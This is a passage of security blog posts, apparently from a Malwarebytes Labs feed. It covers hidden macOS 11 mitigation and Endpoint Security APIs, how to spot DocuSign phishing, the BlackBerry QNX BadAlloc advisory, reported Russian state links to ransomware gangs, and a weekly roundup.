Unlike NO_SMT, TECS doesn’t have a dedicated API, but it’s enabled through a generic API called CPU Security Mitigations (CSM), that can also enable NO_SMT. In C/C++, #include <libproc.h>; no extra library necessary. From <libproc.h>:

/*
 * CPU Security Mitigation APIs
 *
 * Set CPU security mitigation on the current proc (all existing and future threads)
 * This attribute is inherited on fork and exec
 */
int proc_set_csm(uint32_t flags) __API_AVAILABLE(macos(11.0));

/* Set CPU security mitigation on the current thread */
int proc_setthread_csm(uint32_t flags) __API_AVAILABLE(macos(11.0));

/*
 * flags for CPU Security Mitigation APIs
 * PROC_CSM_ALL should be used in most cases,
 * the individual flags are provided only for performance evaluation etc
 */
#define PROC_CSM_ALL         0x0001  /* Set all available mitigations */
#define PROC_CSM_NOSMT       0x0002  /* Set NO_SMT - see above */
#define PROC_CSM_TECS        0x0004  /* Execute VERW on every return to user mode */

As with the dedicated NO_SMT API, we can enable mitigations for the entire current process, using proc_set_csm, or just the calling thread, with proc_setthread_csm. CSM functions, too, are wrappers for process_policy(2).

Finally, just like NO_SMT, CSM also extends posix_spawn(2). From <spawn.h>:

/*
 * Set CPU Security Mitigation on the spawned process
 * This attribute affects all threads and is inherited on fork and exec
 */
int     posix_spawnattr_set_csm_np(const posix_spawnattr_t * __restrict attr, uint32_t flags) __API_AVAILABLE(macos(11.0));
/*
 * flags for CPU Security Mitigation attribute
 * POSIX_SPAWN_NP_CSM_ALL should be used in most cases,
 * the individual flags are provided only for performance evaluation etc
 */
#define POSIX_SPAWN_NP_CSM_ALL         0x0001
#define POSIX_SPAWN_NP_CSM_NOSMT       0x0002
#define POSIX_SPAWN_NP_CSM_TECS        0x0004

The meaning of the flags is identical to the similarly named <libproc.h> flags, and posix_spawnattr_set_csm_np(attr, POSIX_SPAWN_NP_CSM_NOSMT) is 100% identical to and interchangeable with posix_spawnattr_setnosmt_np(attr).

How does it work?

Just like NO_SMT, TECS is a write-once, enable-only flag that is copied from task to task, from task to thread, and from thread to CPU. The task flag is TF_TECS. Below the task level, the flag becomes architecture-specific, x86-64-only, morphing into a mitigation codenamed SEGCHK. Thus, the thread flag is boolean field machine_thread::mthr_do_segchk, and the CPU flag is boolean field cpu_data::cpu_curthread_do_segchk, also known as CPU_NEED_SEGCHK in assembler code.

SEGCHK is implemented entirely in assembler, in kernel-to-user return routines ks_64bit_return and ks_32bit_return. If CPU_NEED_SEGCHK is set for the current CPU, they execute a VERW instruction shortly before the final SYSEXIT/SYSRET/IRET. VERW is an obscure and largely obsolete instruction that checks if the specified segment (the user mode stack segment, in the case of SEGCHK) is writable; but more importantly, it has the side effect of flushing the caches exploited by the RDCL and MDS families of attacks, mitigating them.

TECS is only enabled if it’s supported by the CPU, or if it’s been forced on by default. CPU support for TECS is only checked on x86-64, and it corresponds to whether SEGCHK is supported. The checks, performed at boot time, are:

Using VERW as a mitigation was initially suggested by two of the discoverers of RIDL (page 200), but it seems it proved insufficient, and CPU vendors had to enhance the instruction to act as a proper mitigation. macOS doesn’t trust the un-enhanced VERW.

SEGCHK can be forced on system-wide with a boot parameter. Again, see support article HT210108. Similarly, it can be forced off system-wide with undocumented boot parameter cwad (CPU workaround disable), which has the same syntax as cwae (CPU workaround enable). cwae has priority over cwad.

Unlike NO_SMT, SEGCHK/TECS has no firmware-level equivalent, nor can it be disabled after boot.

Who benefits from NO_SMT and TECS?

Google.

I’ve looked everywhere and no one else seems to use these mitigation APIs. The only source code match (outside of the macOS 11 and 12 SDKs, and the XNU source code itself) is Chromium. The only binary matches on my macOS 11 machine (outside of system libraries) are the Chrome and Electron frameworks, i.e. Chromium. Not even Safari seems to use them!

In Chromium, when compiling for macOS, the base::LaunchOptions structure passed to function base::LaunchProcess contains a boolean field named enable_cpu_security_mitigations; if set, the macOS implementation of base::LaunchProcess launches the new process with CSM flags POSIX_SPAWN_NP_CSM_ALL. If I understand the code correctly, mitigations are enabled for renderer and plugin host sub-processes, and disabled for all other kinds of sub-processes (another possible reading of the code suggests that the feature is implemented, but unused. Honestly, I haven’t dug too deep).

It’s hard not to wonder why Apple went through the effort of implementing mitigations and exposing them as APIs, and then neither document nor even use them. If they are ineffective, the question becomes why Google bothers using them. Either way, we are left with no clear answer.

Endpoint Security API improvements

Endpoint Security probably needs no introduction to the audience of this article, but I’ll still give a brief one.

This C API, first introduced in macOS 10.15, replaced and made obsolete the pre-existing patchwork of archaic auditing, monitoring and policing APIs (among which OpenBSM, KAUTH, Socketfilter and the venerable acct(2)—est. 1979[2]).

The design of Endpoint Security combined the near-absolute visibility and veto power over system state of a MAC[3] policy module with the safety properties of a client-server model, with a really nice and pretty-well-documented API on top. In short, it was the perfect API for a large variety of security applications.

Or was it? Unfortunately, Endpoint Security wasn’t without its own shortcomings, but they’re gradually being rectified. Let’s have a look at the most important improvements that macOS 11 and 12 make to Endpoint Security, only some of which were officially documented.

More message types

More operations can now be detected and/or vetoed, such as fcntl(2), searchfs(2), ptrace(2), remounting a filesystem, IOServiceOpen, task_name_for_pid, process suspension and process resumption.

Interestingly, process suspension includes private system call pid_shutdown_sockets, which doesn’t actually suspend processes, but only shuts down their network connections after they’ve already been suspended. The system call was originally only available on iOS, where it’s part of how apps are sent to the background.

macOS 12 adds some more notifications: setuid(2), setgid(2), seteuid(2), setegid(2), setreuid(2) and setregid(2).

More notifications, less polling

Some process metadata that only used to be available for querying, and necessitated polling and/or diffing to detect changes, now generates change events.

ES_EVENT_TYPE_NOTIFY_CS_INVALIDATED messages notify that a process’s code signature has gone invalid (i.e. CS_VALID flag no longer set) but the process is allowed to keep running (i.e. CS_HARD flag not set). Previously, it was only pollable through private system calls csops or csops_audittoken with operation code CS_OPS_STATUS.

ES_EVENT_TYPE_NOTIFY_REMOTE_THREAD_CREATE messages notify the creation of remote (i.e. inter-process) threads. Previously, this information was only available at low fidelity and with great effort, either by polling and diffing the data returned by Mach task method task_info with flavor TASK_EXTMOD_INFO, or by monitoring syslog for com.apple.kernel.external_modification messages.

More metadata

exec(2) messages now include the new process’s working directory (es_event_exec_t::cwd field).

Process metadata for all messages now includes:

  • The process’s controlling terminal, if any (es_process_t::tty field).
  • The process’s “start time”, i.e. the time when its process identifier was allocated by fork(2) (es_process_t::start_time field). Previously only available through sysctl(2) with the kern.proc.pid.<process identifier> OID.
  • the “responsible process” (es_process_t::responsible_audit_token field), i.e. the process that the notorious (to us developers) Transparency, Consent & Control (TCC) framework blames for an operation subject to user consent. Often, this is the client process that caused a daemon/agent process to be launched, which in an auditing context should be considered the “true” parent of a process (instead of “placeholder” xpcproxy(8)). Previously only available through the private—and completely undocumented—”responsibility” API of MAC policy module Quarantine (e.g. responsibility_get_responsible_for_pid).

Finally, for the first time ever in a macOS auditing API, all messages now report not just the process that caused the message to be generated, but the exact thread as well (es_message_t::thread field).

Improved performance

It’s now possible to process messages asynchronously without the overhead of es_copy_message/es_free_message (equivalent to a sequence of malloc, memcpy and free): Messages are now reference counted (see new functions es_retain_message/es_release_message), and can be moved across threads almost for free. es_copy_message and es_free_message have been outright deprecated and should no longer be used, except for backwards compatibility with macOS 10.15. They won’t be missed by me or my spindump traces.

A vulnerability quietly fixed

Sometimes, diffing SDK versions can even reveal security holes that were quietly fixed. Such is the case for fcntl(2) command F_SETSIZE.

F_SETSIZE is used to change the maximum disk space allocated to a file: If it’s smaller than the current size, the file is truncated; if it’s larger, the file is extended. What stops a malicious process from extending a file so that it fills the entire disk, and then reading from the extended file to carve deleted files out of what was previously free space? Very simple: F_SETSIZE fills the new file space with all zeroes to conceal what it used to contain. As an optimization, a superuser process (effective user id 0) is allowed to extend a file without zeroing out, because a superuser process is assumed to have access to that data anyway.

However, macOS has gradually made the UNIX security model irrelevant. For example, even the superuser is only allowed to access the private documents of a regular user with the user’s permission—permission that is given on a per-application basis, through that protector of users and bane of developers known as the Transparency, Consent & Control (TCC) framework. This reflects the new meaning that macOS has given to the “root” superuser: No longer the administrator of a multi-user system, as it was originally meant on UNIX, but either a temporary identity assumed by each user for system administration tasks (e.g. by way of sudo(8)), or the anonymous user under which daemons run[4].

In this new security model, the superuser can no longer be assumed to have unrestricted access to everything. However, not zeroing space when extending a file would let a superuser process with no entitlements at all recover any file that had been deleted.

macOS 11 fixes this by no longer handling the superuser as a special case for F_SETSIZE. The man page for fcntl(2) now says:

F_SETSIZE . Deprecated. In previous releases, this would allow a process with root privileges to truncate a file without zeroing space. For security reasons, this operation is no longer supported and will instead truncate the file in the same manner as truncate(2).

Even the comments in <sys/fcntl.h> were amended. Before (macOS 10.15 SDK):

#define F_SETSIZE       43              /* Truncate a file without zeroing space */

And after (macOS 11 SDK):

#define F_SETSIZE       43              /* Truncate a file. Equivalent to calling truncate(2) */

As far as I can tell, this information disclosure vulnerability was never assigned a CVE, nor was it publicly acknowledged in any other way before it was silently fixed in macOS 11.

O_NOFOLLOW_ANY

Even primeval APIs like system call open(2) can still have room for improvement. macOS 11 introduces a new flag for it, O_NOFOLLOW_ANY, that mitigates an entire family of potential vulnerabilities, especially in security applications.

Endpoint Security provides the full, resolved (no symlinks), normalized path of each file involved in an auditable event (what OpenBSM veterans/victims like me used to know as “vnode kpath”), but how can applications be sure that the path still identifies the same file by the time they open it? With O_NOFOLLOW_ANY set, open(2) will fail with error ELOOP if any symlink is encountered anywhere in the path: A stronger version of O_NOFOLLOW that applies to the entire path, not just the final component.

Conclusion

What did I learn from my rummaging? Apple still likes its secrets; the Chromium source code still is the best documentation on the mitigations and sandboxing features provided by all major operating systems; diffing releases remains the best way to find hidden features; and some secrets can stay hidden in plain sight for a long time.

I wrote this article in part as a “look at this cool thing”, and in part as a sort of public service, so that the new, hidden macOS features no longer return a deafening silence when queried on search engines. Even if I got some details wrong, at least the topic can now be debated.

Endnotes

1 The relationship between tasks and processes in macOS can be roughly summarized as: Each (BSD) process corresponds exactly to one (Mach[5]) task, and vice versa, until the process calls exec(2). exec(2) terminates the current task, creates a new one and associates it to the process, replacing the dead one. macOS old timers may object that exec(2) actually keeps the same task, resetting its state. It used to work like that, but it was a fragile design, that was dealt a fatal blow by Google researcher Ian Beer in 2016. Starting from XNU 3789.21.4 (macOS 10.12.1, iOS 10.1), exec(2) creates a new task.

2 What’s the use for such an ancient API? It may sound incredible, but until Endpoint Security, macOS had no reliable auditing mechanism to log process deaths. Except acct(2), that is, which to describe as “archaic” would be a compliment. It logs fixed-size records to a global log file, it truncates process names to 9 characters, it logs user ids but not process ids, and the timestamp format for process exit times is a literally unbelievable $frac{1}{64}8^{mathit{exponent}}mathit{mantissa}$ seconds since the process started (good for about 8 years and a half of non-stop running, but with a variable precision that drops below the second at the 2:16:30 mark), encoded in 16 bits as 3 bits $mathit{exponent}$, 13 bits $mathit{mantissa}$; the process start time is a saner 32-bit count of seconds since the UNIX epoch (good for about 17 years from now). We opted not to use acct(2).

3 Mandatory Access Control, no relation to “Mac” as an abbreviation for “Macintosh”. Historically referring to security models patterned after military document classification practices, MAC is nowadays a generic term for any policy-based security model, distinct from and orthogonal to permission-based security models (also known as DAC, or Discretionary Access Control). macOS inherited its modular MAC framework from the TrustedBSD project and uses it with great gusto (I count no fewer than seven policy modules on my macOS 11 machine). The Linux Security Modules framework is the Linux equivalent. Windows has limited MAC in the form of the capabilities system for UWP apps. The bitter irony is that, being limited to a small subset of applications, it’s a “mandatory” access control system that operates on an opt-in basis—to say nothing of its complete non-extensibility.

4 If daemons have to run under an anonymous user, why must it be root, which, while still bound by MAC policies, can bypass all ACLs, send kill signals to any process, invoke sysctls in write mode and in general do a lot of damage? A little known fact is that while system daemons run as root, they also do run inside extremely strict sandboxes based on the Seatbelt framework (internally based on, you guessed it, a MAC policy module, unimaginatively named Sandbox). In a sadly predictable twist, while extremely powerful and enabling incredibly granular access control, Seatbelt is almost completely undocumented (notice a pattern yet?). In a less predictable but sadder twist, it’s also been marked as deprecated with no replacement since OS X 10.8. Nevertheless, with all system daemons using it, plus third-party users of the caliber of Google Chrome and Mozilla Firefox, Seatbelt seems unlikely to disappear any time soon.

5 Mach (no relation to “Macintosh”) was a research project to replace the BSD kernel with a microkernel. The design proved impractical, and the most famous real-world implementation of Mach, NeXTSTEP (later “Darwin”, later “OS X”, later “macOS”), actually runs a Mach/BSD hybrid kernel with very little “micro”. Mach was an extremely influential design: Windows NT (later “Windows”) is a Mach clone too, except redesigned to work alongside a VMS-like kernel instead of a BSD one. Windows NT, too, flirted with a microkernel architecture, but it proved to be no more practical in the 90s than it had been in the 80s.

The post macOS 11’s hidden security improvements appeared first on Malwarebytes Labs.

How to spot a DocuSign phish and what to do about it

Phishing scammers love well known brand names, because people trust them, and their email designs are easy to rip off. And the brands phishers like most are the ones you’re expecting to hear from, or wouldn’t be surprised to hear from, like Amazon or DHL. Now you can add DocuSign to that list.

DocuSign is a service that allows people to sign documents in the Cloud. Signing documents electronically saves a lot of paper and time. It also cuts back on human contact, which is particularly useful for remote working, or when everyone is locked down in a pandemic. Google searches for DocuSign almost doubled during March 2020, and stayed there, as so many people around the world started working from home.

Earlier this year, DocuSign specifically warned about phishing campaigns using its brand.

Bad signs to look for

DocuSign phishing emails have many of the tell-tale signs of other phishing attacks: Fake links, fake senders, misspellings, and the like. Recipients can check links by hovering their mouse pointer over the document link in the email. If it is an actual DocuSign document it will be hosted at docusign.net. In the spam campaigns we have seen, documents were hosted at docs.google.com, feedproxy.google.com, and some documents came as attachments, which DocuSign does not do.

Also, the sender address should belong to docusign.net, but that alone is not enough: We have seen spoofed messages coming from that address, so check for other indicators. You can read an exhaustive list of things to look out for, as well as addresses to report suspicious activity on DocuSign’s incident reporting page (although we recommend you simply opt for the safe document access option, described below).

Remember, if you’re in doubt, it is not stupid or rude to contact a sender by direct mail or another method, and verify the email’s authenticity (just don’t hit “reply”).

We’ve included some examples of DocuSign phishing campaigns below.

Fake DocuSign invoice emails

DocuSign Sample
An example of a phishing email using the DocuSign brand

Signs:

  • “Dear Receiver”? If the sender does not use your actual name, that is a red flag.
  • The security code is way too short.
  • DocuSign links will read “REVIEW DOCUMENT” if it is a document that needs to be signed.
  • An extra space in “inquiries , contact” and other sloppy spelling.
  • Document was hosted at feedproxy.google.com, not docusign.net.
DocuSign Sample2
An example of a phishing email using the DocuSign brand

Signs:

  • “Dear Recipient”? Again, if the sender does not use your actual name, that is a red flag.
  • The security code is way too short.
  • Sentences are slightly off, like you would expect from a non-native speaker.
  • Document was hosted at docs.google.com.

Fake DocuSign attachments

Another sample from our spam honeypot came with an attachment pretending to be from DocuSign.

DocuSign Sample3
An example of a phishing email with an attachment, claiming to be an invoice from DocuSign

The sender address was spoofed. Opening the attachment presents the user with a fake Microsoft login screen, hoping to harvest the target’s password. The information would have been sent to a command and control server through the use of a compromised WordPress website.

login screen
A fake Microsoft login screen triggered by a fake DocuSign invoice

Safe document access

Rather than trying to identify whether or not an email is bad, it’s often safer (and no less convenient) to assume it’s bad and ignore its links completely.

We recommend that you use the “Alternate Signing Method” mentioned in legitimate DocuSign mails. If you get a DocuSign email, visit docusign.com, click ‘Access Documents’, and enter the security code provided in the email. It will have a format similar to this one: EA66FBAC95CF4117A479D27AFB9A85F01. (Don’t bother, it’s invalid.) If a scammer sends you a fake code it simply won’t work. There is no need to trust the sender, or the links in their email.

However, to complicate matters, phishers have now been discovered sending legitimate DocuSign emails from legitimate DocuSign accounts.

Real DocuSign emails used for phishing

Security vendor Avanan recently spotted a new DocuSign campaign that bypasses most of the advice provided above, by using real DocuSign accounts.

In this new attack, scammers upload a file to a real DocuSign account (either a free one or one stolen from somebody else) and share it with the target’s email address.

As result, the recipient will receive a legitimate DocuSign mail with an existing and functional security code that leads to the malicious file. Sharing malicious documents is hard to do because DocuSign does have protection against weaponized attachments: Uploaded document files are converted into static .pdf files, which removes malicious content like embedded macros. It remains to be seen if attackers will find ways around DocuSign’s protections. It probably won’t be necessary though.

Hyperlinks are carried across to the shared document, after it’s converted to a PDF, and remain clickable for the recipient. So all an attacker has to do is make the victim click a link to a phishing site in the DocuSign-hosted document. And scammers are very good at getting people to click on links.

The protection methods against attacks using existing DocuSign accounts are:

  • You can determine if the email is legitimate by contacting the alleged sender using something other than email.
  • If you fall for the scam, anti-malware software will warn you if you try to go to a known phishing site; it should recognize and block malicious files that get downloaded; and its exploit protection will stop malicious documents from deploying their payload.
  • If the phishing site is unknown, a password manager can help. A password manager will not provide credentials for a site that it does not recognize, and while a phishing site might fool the human eye, it won’t fool a password manager. This helps users from getting their passwords harvested.

Keep your passwords safe!

The post How to spot a DocuSign phish and what to do about it appeared first on Malwarebytes Labs.

Cars and hospital equipment running Blackberry QNX may be affected by BadAlloc vulnerability

Following an announcement by Blackberry the U.S. Food & Drug Administration (FDA) and the Cybersecurity & Infrastructure Security Agency (CISA) have put out alerts that vulnerabilities found in the Blackberry QNX real-time operating system (RTOS) may introduce risks for certain medical devices.

Manufacturers are assessing which devices may be affected by the BlackBerry QNX cybersecurity vulnerabilities and are evaluating the risk and developing mitigations, including deploying patches from BlackBerry.

FDA and CISA warnings

The FDA, in its warning that certain medical devices may be affected by BlackBerry QNX cybersecurity vulnerabilities, points to the CISA alert. CISA mentions CVE-2021-22156 which describes an integer overflow vulnerability in the calloc() function of the C runtime library of affected versions of BlackBerry® QNX Software Development Platform (SDP) version(s) 6.5.0SP1 and earlier, QNX OS for Medical 1.1 and earlier, and QNX OS for Safety 1.0.1 and earlier that could allow an attacker to potentially perform a denial of service or execute arbitrary code.

Balckberry’s QNX is an RTOS. RTOS is a term to describe an operating system (OS) intended to serve real-time applications that process data as it comes in. Typically this type of software is deployed in devices that require immediate interaction based on incoming information. The best example in this case may be the driver assistance options that many car manufacturers provide nowadays.

Publicly disclosed computer security flaws are listed in the Common Vulnerabilities and Exposures (CVE) database. Its goal is to make it easier to share data across separate vulnerability capabilities (tools, databases, and services). CISA mentions CVE-2021-22156 is part of a collection of integer overflow vulnerabilities, known as BadAlloc.

What is BadAlloc?

In April of 2021 the Azure Defender for IoT security research group uncovered a series of critical memory allocation vulnerabilities in IoT and OT devices that adversaries could exploit to bypass security controls in order to execute malicious code or cause a system crash.

These Remote Code Execution (RCE) vulnerabilities were dubbed BadAlloc and they were found to affect a wide range of domains, from consumer and medical IoT to Industrial IoT, Operational Technology (OT), and industrial control systems. Given the pervasiveness of IoT and OT devices, these vulnerabilities, if successfully exploited, represent a significant potential risk for organizations of all kinds.

We blogged about BadAlloc back in April if you are interested in more details.

Blackberry

If you are in my age group, you may remember Blackberry as a producer of smartphones that went the same way as VHS tapes and vinyl records. Appreciated by a few but hardly a serious competitor for the big guns.

Nowadays Blackberry produces software that is widely used—for example, in two hundred million cars, along with critical hospital and factory equipment. Automakers use BlackBerry® QNX® software in their advanced driver assistance, digital instrument clusters, connectivity modules, handsfree, and infotainment systems that appear in multiple car brands, including Audi, BMW, Ford, GM, Honda, Hyundai, Jaguar, Land Rover, KIA, Maserati, Mercedes-Benz, Porsche, Toyota, and Volkswagen.

Keep it under the hood

Back when BadAlloc was made public, Blackberry kept quiet. But now BlackBerry announced that old but still widely used versions of one of its flagship products, an operating system called QNX, contain a vulnerability that could let hackers cripple devices that use it.

Insiders have accused Blackberry of purposefully keeping this information to themselves at first. Blackberry initially even denied that BadAlloc impacted its products at all and later resisted making a public announcement, even though it couldn’t identify and inform all of the customers using the software.

Mitigation

CISA strongly encourages critical infrastructure organizations and other organizations developing, maintaining, supporting, or using affected QNX-based systems to patch affected products as quickly as possible.

  • Manufacturers of products that incorporate vulnerable versions should contact BlackBerry to obtain the patch.
  • Manufacturers of products who develop unique versions of RTOS software should contact BlackBerry to obtain the patch code. Note: in some cases, manufacturers may need to develop and test their own software patches.
  • End users of safety-critical systems should contact the manufacturer of their product to obtain a patch. If a patch is available, users should apply the patch as soon as possible. If a patch is not available, users should apply the manufacturer’s recommended mitigation measures until the patch can be applied. Note: installation of software updates for RTOS frequently may require taking the device out of service or to an off-site location for physical replacement of integrated memory.

A full list of affected QNX products and versions are available at the QNX website.

Unlike computers, Internet-connected devices can be difficult, or even impossible to update. When these devices require internet access for their operation this poses a big security risk. All you can try to do is reduce the attack surface by minimizing or eliminating exposure of vulnerable devices to the internet; implementing network security monitoring to detect behavioral indicators of compromise; and strengthening network segmentation to protect critical assets.

Stay safe, everyone!

The post Cars and hospital equipment running Blackberry QNX may be affected by BadAlloc vulnerability appeared first on Malwarebytes Labs.

Analysts “strongly believe” the Russian state colludes with ransomware gangs

“We have the smoke, the smell of gunpowder and a bullet casing. But we do not have the gun to link the activity to the Kremlin.” This is what Jon DiMaggio, Chief Security Stretegist for Analyst1, said in an interview with CBS News following the release of its latest whitepaper, entitled “Nation State Ransomware“. The whitepaper is Analyst1’s attempt to identify the depth of human relationships between the Russian government and the ransomware threat groups based in Russia.

“We wanted to have that, but we believe after conducting extensive research we came as close as possible to proving it based on the information/evidence available today.” DiMaggio concluded.

Here are some of the key players and connections identified by Analyst1:

Evgeniy “Slavik” Bogachev

Hailed as “the most prolific bank robber in the world“, Bogavech is best known for creating ZeuS, one of the most prolific banking information stealers ever seen. According to the report, Bogavech created a “secret ZeuS variant and supporting network” on his own, without the knowledge of his closest underground associates—The Business Club. This ZeuS variant, which is a modified GameOver ZeuS (GOZ), was designed specifically for espionage, and it was aimed at governments and intelligence agencies connected with Ukraine, Turkey, and Georgia.

Analyst1, too, believes that, at some point, Bogachev was approached by the Russian government to work for them in exchange for their blessing to have him continue his fraud operations.

The United States officially indicted Bogachev in May 2014. Seven years on, Russia still refuses to extradite Bogachev. The Ukraine Interior Ministry had provided the reason why: Bogachev was “working under the supervision of a special unit of the FSB.” That is, the Federal Security Service, Russia’s security agency and successor to the Soviet Union’s KGB.

EvilCorp

The Business Club, the underground criminal gang that Bogachev himself put together, continued their operations. In fact, under the new leadership of Maksim “Aqua” Yakubets, Bogachev’s successor, the criminal enterprise rebranded and started calling themselves EvilCorp. Some cybersecurity companies recognize or name them Indrik Spider. Since then, they have been behind campaigns involving the harvesting of banking credentials in over 40 countries using sophisticated Trojan malware known as Dridex.

Yakubets was hired by the FSB in 2017 to directly support the Russian government’s “malicious cyber efforts”. He’s also the likely candidate for this job due to his relationship with Eduard Bendesky, a former FSB colonel who is also his father-in-law. It was also in 2017 that EvilCorp started creating and using ransomware—BitPaymer, WastedLocker, and Hades—for their financially-motivated campaigns. In addition, Dridex had been used to drop ransomware onto victim machines.

SilverFish

SilverFish was one of those threat actors who were quick enough to take advantage of the SolarWinds breach that was made public in mid-December of 2020. If you may recall, multiple companies that use SolarWind’s Orion software were reportedly compromised via a supply-chain attack.

SilverFish is a known Russian espionage attacker and is said to be related to EvilCorp, in that this group shared similar tools and techniques against one victim: Use of the same command and control (C&C) infrastructure and unique CobaltStrike Beacon. SilverFish even attacked the same organization a few months after EvilCorp attacked it with their ransomware.

Wizard Spider

Wizard Spider is the gang behind the Conti and Ryuk ransomware strains. Analyst1 has previously profiled Wizard Spider as one of the groups operating as part of a ransomware cartel. DiMaggio and his team believes that Wizard Spider is responsible for managing and controlling TrickBot.

EvilCorp has a history of using TrickBot to deliver its BitPaymer ransomware to victim systems. This suggests that a certain level of relationship is at play between the two groups.

Does it matter?

While the Analyst1 report contains some interesting findings, we agree that it doesn’t deliver a smoking gun. That doesn’t mean there isn’t a smoking gun, somewhere, of course. But even if there is, unless you’re an intelligence agency like the NSA, establishing the intent of a potential attacker can be a waste of time and effort.

Does that mean you shouldn’t care about attribution at all? No. It’s sensible to update your threat model in response to tactics used by real-world threat actors. But it often doesn’t matter who is doing the attacking. Ransomware is well established and well resourced threat to your business whether it’s state-funded or criminal gangs living off several years of multi-million dollar payouts and a Bitcoin boom.

You can read more about attribution in our two part series on the subject, starting with when you should care.

The post Analysts “strongly believe” the Russian state colludes with ransomware gangs appeared first on Malwarebytes Labs.

A week in security (August 9 – August 15)

Last week on Malwarebytes Labs:

Other cybersecurity news:

Stay safe, everyone!

The post A week in security (August 9 – August 15) appeared first on Malwarebytes Labs.